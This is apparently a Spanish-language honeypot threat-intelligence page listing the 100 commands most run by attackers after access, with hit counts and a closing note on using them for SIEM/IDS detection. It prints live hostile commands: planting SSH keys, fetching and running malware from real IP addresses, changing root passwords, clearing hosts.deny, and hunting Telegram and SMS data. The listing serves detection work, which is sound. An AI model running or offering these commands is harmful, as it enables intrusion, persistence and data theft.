TROYANOSYVIRUS
Actualizado: diciembre de 2025

Top 100 Comandos Maliciosos

Los comandos mas ejecutados por atacantes tras obtener acceso a sistemas. Util para deteccion de intrusiones y respuesta a incidentes.

10,016 comandos en 24h
1.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
188 IPs515x
2.
$lockr -ia .ssh
188 IPs515x
3.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
184 IPs502x
4.
$uname -a
168 IPs426x
5.
$cat /proc/cpuinfo | grep name | wc -l
162 IPs425x
6.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
164 IPs422x
7.
$lscpu | grep Model
164 IPs421x
8.
$uname
162 IPs420x
9.
$top
160 IPs418x
10.
$whoami
163 IPs417x
11.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
158 IPs417x
12.
$crontab -l
161 IPs417x
13.
$cat /proc/cpuinfo | grep model | grep name | wc -l
160 IPs415x
14.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
160 IPs415x
15.
$uname -m
162 IPs415x
16.
$ls -lh $(which ls)
160 IPs414x
17.
$which ls
160 IPs414x
18.
$w
159 IPs413x
19.
$Enter new UNIX password:
129 IPs254x
20.
$Enter new UNIX password:
129 IPs254x
21.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
107 IPs167x
22.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
31 IPs128x
23.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
43 IPs111x
24.
$uname -s -v -n -m 2 > /dev/null
43 IPs111x
25.
$/bin/./uname -s -v -n -r -m
15 IPs84x
26.
$uname -s -v -n -r -m
17 IPs75x
27.
$uname -m 2 > /dev/null
31 IPs64x
28.
$cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./arm.uhavenobotsxd android; busybox wget http://94.154.35.154/arm5.uhavenobotsxd; curl http://94.154.35.154/arm5.uhavenobotsxd -O; chmod +x arm5.uhavenobotsxd; ./arm5.uhavenobotsxd android; busybox wget http://94.154.35.154/arm6.uhavenobotsxd; curl http://94.154.35.154/arm6.uhavenobotsxd -O; chmod +x arm6.uhavenobotsxd; ./arm6.uhavenobotsxd
1 IPs33x
29.
$cd /data/local/tmp/; busybox wget http://31.97.147.189/w.sh; sh w.sh; curl http://31.97.147.189/c.sh; sh c.sh; wget http://31.97.147.189/wget.sh; sh wget.sh; curl http://31.97.147.189/wget.sh; sh wget.sh; busybox wget http://31.97.147.189/wget.sh; sh wget.sh; busybox curl http://31.97.147.189/wget.sh; sh wget.sh
2 IPs28x
30.
$for d in /data/local/tmp /tmp /dev/shm /var/tmp /data /; do if touch $d/.w 2>/dev/null; then cd $d; rm .w; break; fi; done; rm -f x; arch=$(uname -m); if [ "$arch" = "x86_64" ]; then BIN="shadow.x86_64"; elif [ "$arch" = "i686" ] || [ "$arch" = "i386" ]; then BIN="shadow.x86"; elif [ "$arch" = "mips" ]; then BIN="shadow.mips"; elif [ "$arch" = "mipsel" ]; then BIN="shadow.mpsl"; elif [ "$arch" = "armv7l" ] || [ "$arch" = "armv7" ]; then BIN="shadow.arm7"; elif [ "$arch" = "armv6l" ]; then BIN="s
1 IPs19x
31.
$cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh
2 IPs13x
32.
$echo SHELL_TEST
1 IPs11x
33.
$shell
5 IPs10x
34.
$system
5 IPs10x
35.
$cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 3338 > parm7; toybox nc 130.12.180.76 3336 > parm5; toybox nc 130.12.180.76 3337 > parm6; toybox nc 130.12.180.76 3335 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;
1 IPs10x
36.
$uname -s -v -n -r-m
2 IPs9x
37.
$echo SCANNER_TEST
8 IPs9x
38.
$q
4 IPs8x
39.
$curl2
1 IPs7x
40.
$uname -s -m
7 IPs7x
41.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs7x
42.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs7x
43.
$/ip cloud print
3 IPs6x
44.
$sh
5 IPs5x
45.
$while read i
5 IPs5x
46.
$pm path com.ufo.miner
3 IPs5x
47.
$enable
5 IPs5x
48.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
4 IPs4x
49.
$Accept-Encoding: gzip
2 IPs4x
50.
$rm .s; exit
4 IPs4x
51.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs3x
52.
$cat /proc/cpuinfo
3 IPs3x
53.
$ps | grep '[Mm]iner'
3 IPs3x
54.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
3 IPs3x
55.
$ps -ef | grep '[Mm]iner'
3 IPs3x
56.
$ifconfig
3 IPs3x
57.
$echo Hi | cat -n
3 IPs3x
58.
$locate D877F783D5D3EF8Cs
3 IPs3x
59.
$Accept: */*
1 IPs2x
60.
$./0hpbC7Bh
1 IPs2x
61.
$rm /data/local/tmp/ufo.apk
2 IPs2x
62.
$echo "root:5H2Qyrl6Y2mW"|chpasswd|bash
2 IPs2x
63.
$echo "123456\n0pw9ovxJbggS\n0pw9ovxJbggS\n"|passwd
1 IPs1x
64.
$echo "123456789\nUN9fCms1KADP\nUN9fCms1KADP\n"|passwd
1 IPs1x
65.
$echo "123456789\nTfO86uQzuTYx\nTfO86uQzuTYx\n"|passwd
1 IPs1x
66.
$echo "123456789\nIbBjsBl5n8vy\nIbBjsBl5n8vy\n"|passwd
1 IPs1x
67.
$Intel Mac OS X 10_15_7
1 IPs1x
68.
$echo "123456789\n76f8iqg8PUKm\n76f8iqg8PUKm\n"|passwd
1 IPs1x
69.
$echo "123456789\n3fum88QeLtjz\n3fum88QeLtjz\n"|passwd
1 IPs1x
70.
$cat /proc/mounts; /bin/busybox NMYXY
1 IPs1x
71.
$echo "123456789\n1nkQNGjqfAtZ\n1nkQNGjqfAtZ\n"|passwd
1 IPs1x
72.
$echo "123123\nzj9A7hujHD9q\nzj9A7hujHD9q\n"|passwd
1 IPs1x
73.
$cat /proc/mounts; /bin/busybox KUQDM
1 IPs1x
74.
$/bin/busybox KKIVX
1 IPs1x
75.
$echo "123123\nhgDaFiby1R0D\nhgDaFiby1R0D\n"|passwd
1 IPs1x
76.
$echo "123123\nVvtZhVMGfs8l\nVvtZhVMGfs8l\n"|passwd
1 IPs1x
77.
$cat /proc/mounts; /bin/busybox KKIVX
1 IPs1x
78.
$echo "123123\n2LBlWS6oXQBb\n2LBlWS6oXQBb\n"|passwd
1 IPs1x
79.
$echo "123123\n0I4KnCCB8Fvb\n0I4KnCCB8Fvb\n"|passwd
1 IPs1x
80.
$cat /proc/mounts; /bin/busybox ISAOI
1 IPs1x
81.
$echo "1122\n9lWc7tt5NTCd\n9lWc7tt5NTCd\n"|passwd
1 IPs1x
82.
$echo "1q2w3e4r5T\nFv3dzw06Vq3O\nFv3dzw06Vq3O\n"|passwd
1 IPs1x
83.
$cat /proc/mounts; /bin/busybox BHKVR
1 IPs1x
84.
$echo "1\nnpPRqp8RrWqz\nnpPRqp8RrWqz\n"|passwd
1 IPs1x
85.
$echo "1\nf0FjM6lnFlbn\nf0FjM6lnFlbn\n"|passwd
1 IPs1x
86.
$echo "1\nQOdM0eKiXJe7\nQOdM0eKiXJe7\n"|passwd
1 IPs1x
87.
$Chrome/126.0.0.0 Safari/537.36
1 IPs1x
88.
$/bin/busybox ISAOI
1 IPs1x
89.
$./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
1 IPs1x
90.
$echo "1\n2HE2czVPRFdx\n2HE2czVPRFdx\n"|passwd
1 IPs1x
91.
$echo "1\n0KuBIVaoehoB\n0KuBIVaoehoB\n"|passwd
1 IPs1x
92.
$echo "123\nxIQxRc4LJ4BE\nxIQxRc4LJ4BE\n"|passwd
1 IPs1x
93.
$echo "123\nwyDs7eS5bBkE\nwyDs7eS5bBkE\n"|passwd
1 IPs1x
94.
$echo "123\njqelCevOmsCI\njqelCevOmsCI\n"|passwd
1 IPs1x
95.
$echo "123\njQcJxKtKwa9e\njQcJxKtKwa9e\n"|passwd
1 IPs1x
96.
$echo "123\nciXqCNGg5bhi\nciXqCNGg5bhi\n"|passwd
1 IPs1x
97.
$echo "123\nc7f7zpefMMzv\nc7f7zpefMMzv\n"|passwd
1 IPs1x
98.
$echo "1\nr9gdtPvBZ4uN\nr9gdtPvBZ4uN\n"|passwd
1 IPs1x
99.
$chmod +x ./.797392456851139211/sshd;nohup ./.797392456851139211/sshd 103.145.145.79 109.176.202.12 101.91.114.194 95.214.181.29 111.203.190.237 122.225.202.150 103.228.170.105 89.169.12.61 101.36.228.201 83.142.209.109 50.6.172.32 82.26.91.241 50.6.4.160 158.51.96.38 115.231.181.61 103.145.145.73 47.100.213.47 115.239.255.196 103.218.243.223 121.137.217.242 177.70.2.194 45.81.23.49 27.148.182.148 156.254.3.130 103.145.145.82 45.129.183.157 106.75.29.239 103.214.112.63 2.189.86.111 123.54.197.60
1 IPs1x
100.
$chmod +x ./.5019559907050924016/sshd;nohup ./.5019559907050924016/sshd 106.13.58.88 156.254.3.130 103.145.145.82 154.211.13.102 60.205.152.248 72.60.102.102 119.96.62.55 36.163.199.18 43.163.220.159 156.238.231.2 179.189.229.2 223.75.204.39 190.123.74.50 8.245.24.52 107.175.159.248 115.50.78.147 103.174.130.65 188.166.211.175 189.230.100.92 8.211.165.95 77.110.112.138 103.145.145.78 39.96.223.182 89.42.199.69 123.178.171.238 138.197.163.192 178.128.253.94 180.163.61.238 151.234.162.15 125.124.10
1 IPs1x

Reconocimiento

uname, whoami, cat /etc/passwd

Descarga

wget, curl, tftp

Persistencia

crontab, chmod, chattr

Mov. Lateral

ssh, scp, ping

Uso para Deteccion

Estos comandos pueden usarse para crear reglas de deteccion en SIEM, IDS/IPS, y sistemas de monitorizacion. Monitoriza estos patrones en tus logs para detectar intrusiones.